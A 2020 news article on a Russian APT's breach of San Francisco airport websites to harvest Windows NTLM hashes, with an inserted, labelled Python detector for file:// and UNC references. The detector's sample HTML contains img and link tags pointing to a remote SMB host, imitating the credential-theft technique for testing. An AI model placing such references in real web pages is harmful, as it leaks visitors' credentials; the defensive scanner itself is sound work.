Russian threat group suspected of hacking SFO

Published: 14 Apr 2020


Russian state-sponsored threat actors are suspected to have hacked San Francisco’s airport last month.

The San Francisco International Airport (SFO) disclosed a data breach last Tuesday that affected a number of employees and third-party contractors who accessed SFOConnect.com and SFOConstruction.com in March. While SFO did not offer any insight into who hacked the websites, researchers from antimalware vendor ESET this week said the breach appeared to be the work of a Russian APT known as Dragonfly/Energetic Bear.

The attackers utilized “malicious computer code” in order to steal select users’ Windows login credentials, according to the SFO’s breach notification.

“Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO,” the breach disclosure notice read.

ESET Research reported on Tuesday that the breach was “in line with the TTPs [tactics, techniques and procedures] of an APT group known as Dragonfly/Energetic Bear,” and that “The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix.”
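As an added defensive example (not code from the article, ESET or SFO): a small Python scanner that flags HTML resource references using a file:// URL or a UNC path pointing at a non-local host, the pattern ESET describes for harvesting visitors' NTLM hashes over SMB. The sample page and the 203.0.113.5 address are constructed.

```python
"""Flag HTML resource references that would make a Windows browser open an
outbound SMB connection (file:// URLs or \\host\share UNC paths)."""
import re
from html.parser import HTMLParser

# Attributes whose value a browser fetches automatically or on click.
FETCH_ATTRS = {"src", "href", "action", "data", "poster"}
# file://host/share/... (any number of slashes) or \\host\share\...
UNC_RE = re.compile(r"^(?:file:/{2,}|\\\\)(?P<host>[^/\\]+)[/\\]", re.IGNORECASE)


def _is_local(host):
    """Drive letters and loopback names never leave the machine."""
    return host.lower() in {"localhost", "127.0.0.1", "::1"} or bool(re.fullmatch(r"[a-z]:", host, re.I))


class SmbRefScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, remote host, raw value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # names are already lower-cased by HTMLParser
            if name in FETCH_ATTRS and value:
                m = UNC_RE.match(value.strip())
                if m and not _is_local(m.group("host")):
                    self.findings.append((tag, name, m.group("host"), value))


def find_smb_references(html):
    """Return every (tag, attribute, host, value) that targets a remote SMB host."""
    scanner = SmbRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one benign CDN image, two references that would
# trigger an SMB connection (203.0.113.5 is a documentation address), one local.
SAMPLE_HTML = """
<html><body>
<img src="//cdn.example.test/logo.png">
<img src="file://203.0.113.5/share/pixel.png" width=1 height=1>
<link rel="stylesheet" href="\\\\203.0.113.5\\share\\style.css">
<a href="file:///C:/Windows/notepad.exe">local drive, not flagged</a>
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, host, value in find_smb_references(SAMPLE_HTML):
        print(f"<{tag} {attr}> -> SMB host {host}: {value}")
```

Pair a check like this with egress filtering of TCP 445 so that a browser which does follow such a reference cannot complete the authentication to an Internet host.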

After the malicious code was discovered, both websites were temporarily taken offline and the airport forced a reset of all “SFO related email and network passwords.”

SFO did not return SearchSecurity’s request for comment.

Dragonfly/Energetic Bear has been active since 2011. Initially the cyberespionage group targeted defense contractors, aviation companies and government agencies. In recent years, security researchers observed the group targeting critical infrastructure in the U.S. In 2017, Symantec reported a “Dragonfly 2.0” campaign was attempting to infiltrate the networks of energy companies.


Rosa G. Rose
